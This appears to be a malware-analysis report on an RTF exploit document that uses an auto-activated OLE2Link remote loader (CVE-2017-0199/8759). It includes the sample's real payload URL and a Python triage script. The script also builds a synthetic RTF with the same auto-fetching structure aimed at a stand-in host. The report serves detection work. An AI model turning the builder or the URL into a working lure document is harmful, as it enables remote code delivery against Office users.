Malicious RTF — malware analysis report

Static analysis result for SHA-256 a8128ed41ccba857…

MALICIOUS

RTF

Size: 559.0 KB   Created: 2017-11-19 09:10:00   First seen: 2018-04-30
MD5: e5f5b9c00a5bbd89809dc28c960e242a SHA-1: ecbacb5429121a511958ceb70a634a1f6a9f08c5 SHA-256: a8128ed41ccba8574948cdb17e5719575cc1c82a047ed38c4d806d432ffb5521
Risk score: 402

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF embeds OLE object data that acts as a remote loader, the exploitation pattern of CVE-2017-0199 or CVE-2017-8759: the object is force-activated when the document is opened and fetches a second-stage payload from the embedded URL, which is then executed. String references to WinExec, CreateProcess, ShellExecute and LoadLibrary in the file are consistent with the second stage being run as external code. The ClamAV signature match corroborates the static verdict. Because the payload server is no longer reachable, the file alone does not establish which of the two CVEs was triggered.

Heuristics (11)

  • CVE-2017-0199 / CVE-2017-8759 (OLE2Link auto-activated remote loader) critical CVE related RTF_OLE2LINK_REMOTE_MONIKER_LOADER
    RTF embeds an OLE2Link object that is force-activated with \objupdate (no user interaction beyond opening the document) and fetches a remote second stage through an INCLUDETEXT/INCLUDEPICTURE field. This field-delivered OLE2Link auto-update path is shared by CVE-2017-0199 (the server returns an HTA/scriptlet that Office hands to mshta.exe) and CVE-2017-8759 (the server returns a SOAP WSDL that the .NET WSDL parser compiles and runs). Office issues the same request either way; which CVE applies is decided by the content type the server returns, and that server is now unreachable, so the file alone cannot settle it.
  • ClamAV: Rtf.Downloader.CVE_2017-6336326-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Downloader.CVE_2017-6336326-3
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate, which forces the embedded OLE object to be instantiated as soon as the document is opened, with no user interaction. Benign documents almost never use it; it is a standard marker of Equation Editor (CVE-2017-11882) and OLE2Link (CVE-2017-0199) exploit documents.
  • INCLUDETEXT/INCLUDEPICTURE remote URL high RTF_INCLUDE_REMOTE
    RTF document uses INCLUDETEXT or INCLUDEPICTURE with an http:// URL. Depending on the Office version and external-content settings, Word fetches the remote content on open, which enables remote template injection, NTLM credential capture via redirects, or payload delivery.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • OLE object data medium RTF_OBJDATA
    RTF contains 2 \objdata section(s) — embedded OLE objects
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://109.245.221.126/POD/t.php?stats=send&thread=0 In RTF body
    • http://schemas.microsoft.com/office/word/2003/wordml In RTF body (WordprocessingML XML namespace identifier, not a network indicator)
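The checks behind the Malware Insights paragraph and the RTF_OBJUPDATE, RTF_INCLUDE_REMOTE, RTF_OBJDATA and SC_STR_* heuristics above can be reproduced with a short triage script. The following is an added example written for this page, not the scanner's own code: it locates \objupdate, decodes each \objdata hex group, reads the OLE 1.0 ObjectHeader (MS-OLEDS) to recover the class name (OLE2Link in this attack path), pulls ASCII and UTF-16LE URLs out of the object blob, extracts INCLUDETEXT/INCLUDEPICTURE URLs, scans for the API name strings, and combines them into the same verdict. The document it runs on is constructed inline (TEST-NET addresses, synthetic OLE blobs) and is not the analysed sample; the offset it reports is the start of the hex data, matching the convention of the artifact table.

```python
import re
import struct

OLE_V1 = 0x00000501  # OLEVersion field of an OLE 1.0 ObjectHeader (MS-OLEDS)
OBJUPDATE_RE = re.compile(rb"\\objupdate(?![A-Za-z])")            # the control word itself, not a prefix
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)\}")    # hex payload of one {\*\objdata ...} group
INCLUDE_RE = re.compile(rb'INCLUDE(?:TEXT|PICTURE)\s*\\?"?\s*((?:https?|file)://[^"\s}\\]+)')
ASCII_URL = re.compile(rb"(?:https?|file)://[\x21-\x7e]+")
UTF16_URL = re.compile(rb"(?:h\x00t\x00t\x00p\x00(?:s\x00)?|f\x00i\x00l\x00e\x00):\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")
API_NAMES = [b"WinExec", b"CreateProcess", b"ShellExecute", b"LoadLibrary", b"VirtualAlloc"]


def decode_objdata(hexdata: bytes) -> bytes:
    """Turn the whitespace-interleaved hex of an objdata group back into bytes."""
    h = re.sub(rb"\s+", b"", hexdata)
    if len(h) % 2:            # drop a dangling nibble rather than fail on a damaged sample
        h = h[:-1]
    return bytes.fromhex(h.decode("ascii"))


def parse_ole1_header(blob: bytes):
    """Split an OLE 1.0 object into (class_name, payload); None if there is no ObjectHeader."""
    if len(blob) < 12:
        return None
    version, format_id, cn_len = struct.unpack_from("<III", blob, 0)
    if version != OLE_V1 or 12 + cn_len > len(blob):
        return None
    off = 12
    class_name = blob[off:off + cn_len].rstrip(b"\x00")
    off += cn_len
    for _ in range(2):        # TopicName and ItemName, both length-prefixed
        if off + 4 > len(blob):
            return None
        (n,) = struct.unpack_from("<I", blob, off)
        off += 4 + n
    if format_id != 2 or off + 4 > len(blob):   # not an embedded object: hand back the tail
        return class_name, blob[off:]
    (native_size,) = struct.unpack_from("<I", blob, off)
    return class_name, blob[off + 4:off + 4 + native_size]


def extract_urls(data: bytes) -> list:
    """URLs in ASCII and UTF-16LE (monikers inside OLE2Link objects are UTF-16LE)."""
    urls = [u.decode("latin-1") for u in ASCII_URL.findall(data)]
    urls += [u.decode("utf-16-le") for u in UTF16_URL.findall(data)]
    return urls


def analyze(rtf: bytes) -> dict:
    """RTF_OBJUPDATE / RTF_INCLUDE_REMOTE / RTF_OBJDATA / SC_STR_* checks combined into one verdict."""
    report = {"objupdate": bool(OBJUPDATE_RE.search(rtf)), "objects": [], "api_refs": [],
              "include_urls": [u.decode("latin-1") for u in INCLUDE_RE.findall(rtf)]}
    for m in OBJDATA_RE.finditer(rtf):
        blob = decode_objdata(m.group(1))
        parsed = parse_ole1_header(blob)
        report["objects"].append({"offset": m.start(1),  # offset of the hex data in the RTF
                                  "class_name": parsed[0].decode("latin-1") if parsed else "?",
                                  "size": len(blob), "urls": extract_urls(blob)})
        for api in API_NAMES:
            if api in blob and api.decode() not in report["api_refs"]:
                report["api_refs"].append(api.decode())
    remote = bool(report["include_urls"]) or any(o["urls"] for o in report["objects"])
    ole2link = any(o["class_name"] == "OLE2Link" for o in report["objects"])
    report["verdict"] = ("OLE2Link auto-activated remote loader (CVE-2017-0199 / CVE-2017-8759 path)"
                         if report["objupdate"] and ole2link and remote
                         else "no auto-activated remote loader found")
    return report


def build_ole1_object(class_name: bytes, native: bytes) -> bytes:
    """Build an OLE 1.0 embedded-object blob; used only to construct the test document."""
    cn = class_name + b"\x00"
    return (struct.pack("<II", OLE_V1, 2) + struct.pack("<I", len(cn)) + cn
            + struct.pack("<II", 0, 0) + struct.pack("<I", len(native)) + native)


def make_sample() -> bytes:
    """Constructed test RTF (not the analysed sample): an auto-updated OLE2Link object with a
    UTF-16LE URL, a Package object containing a WinExec string, and an INCLUDETEXT field."""
    link_native = b"\x00" * 16 + "http://203.0.113.10/POD/stage.hta".encode("utf-16-le") + b"\x00\x00"
    link_hex = build_ole1_object(b"OLE2Link", link_native).hex().encode()
    pkg_hex = build_ole1_object(b"Package", b"MZ" + b"\x00" * 8 + b"WinExec\x00").hex().encode()
    return b"".join([
        rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}", b"\n",
        rb'{\field{\*\fldinst INCLUDETEXT "http://203.0.113.10/POD/t.php?stats=send&thread=0" \\c htm}{\fldrslt }}', b"\n",
        rb"{\object\objautlink\objupdate\objw1\objh1{\*\objdata ", link_hex[:40], b"\r\n", link_hex[40:],
        rb"}{\result{\pict}}}", b"\n",
        rb"{\object\objemb{\*\objdata ", pkg_hex, rb"}{\result{\pict}}}", b"\n}",
    ])


SAMPLE_RTF = make_sample()
```

Run `analyze()` on a real sample's bytes to get the same fields the report shows (`objupdate`, `include_urls`, one entry per \objdata group with class name, size and URLs, plus the API strings). Real OLE2Link objects carry the URL in a moniker inside a compound-file payload, so the UTF-16LE scan is what finds it; obfuscated RTFs that split or nest the \objdata group will need a proper RTF tokenizer rather than the single regex used here.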

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
objdata_00_off0000c568.bin | rtf-objdata-decoded | RTF \objdata at offset 0xC568 | 2598 bytes
    SHA-256: 4667fb32fa2ee4c6570610bfbf2f7be3b710cfe8b8bf720240ba1d73442dd1dc
objdata_01_off0000dc96.bin | rtf-objdata-decoded | RTF \objdata at offset 0xDC96 | 2674 bytes
    SHA-256: 4d3eef4e6280dd054ca7cb0549926de862d1fa26aea931b2984c8aec329bf281